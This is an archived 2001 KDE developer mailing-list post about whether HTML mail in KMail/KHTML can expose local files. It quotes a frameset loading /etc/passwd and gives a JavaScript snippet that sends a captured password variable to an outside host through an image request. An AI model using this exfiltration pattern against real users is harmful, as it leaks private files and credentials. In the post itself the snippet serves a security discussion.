[prev in list] [next in list] [prev in thread] [next in thread] 

List:       kfm-devel
Subject:    Re: Possible security problem in KHTML or KMail?
From:       Vadim Plessky <lucy-ples () mtu-net ! ru>
Date:       2001-10-11 13:59:54
[Download RAW message or body]

On Thursday 11 October 2001 11:58, Rob Kaper wrote:
|   On Wed, Oct 10, 2001 at 09:14:59PM +0200, Ingo Klöcker wrote:
|   > <html><head></head><frameset><frame src="/etc/passwd"></frameset>
|   > <body></body></html>
|
|   This is by no means a security risk. Local users have always been able to
|   read/display the /etc/passwd file.

That's right.
But what if some JavaScript code parsed this /etc/passwd and sent to another 
web site?

let's assume password (or other private info)  is already in "mypasw" 
variable.
This fragment of JS:
<script language="JavaScript"><!--
d=document;
d.write('<img src="http://your.web.page.com/counter'+
'?id=111;t=81;pas='+mypasw+';rand='+Math.random()+
'" alt="ha ha" '+ 'border=0 height=31 width=38>')</script>
-->
</script >
will effectivly send "mypasw" to http://your.web.page.com/ site (you need 
just to track incoming requests on server, and parse them and store later in 
database)

Frankly speaking, I am not Linux security expert, and don't know how 
confidential information in /etc/passwd  is.
It just has some user names, but no passwords.
Of course, in this manner you can steal all KDE settings (from ~/.kde), but I 
don't know if it is some kind of risk at all.

P.S. I agree with Ingo Klöcker "The only security problem is allowing
HTML messages to be rendered at all.". If you disabled JavaScript, and do not 
render HTML at all - you should feel yourself secure.
-- 

Vadim Plessky
http://kde2.newmail.ru  (English)
33 Window Decorations and 6 Widget Styles for KDE
http://kde2.newmail.ru/kde_themes.html
KDE mini-Themes
http://kde2.newmail.ru/themes/

[prev in list] [next in list] [prev in thread] [next in thread]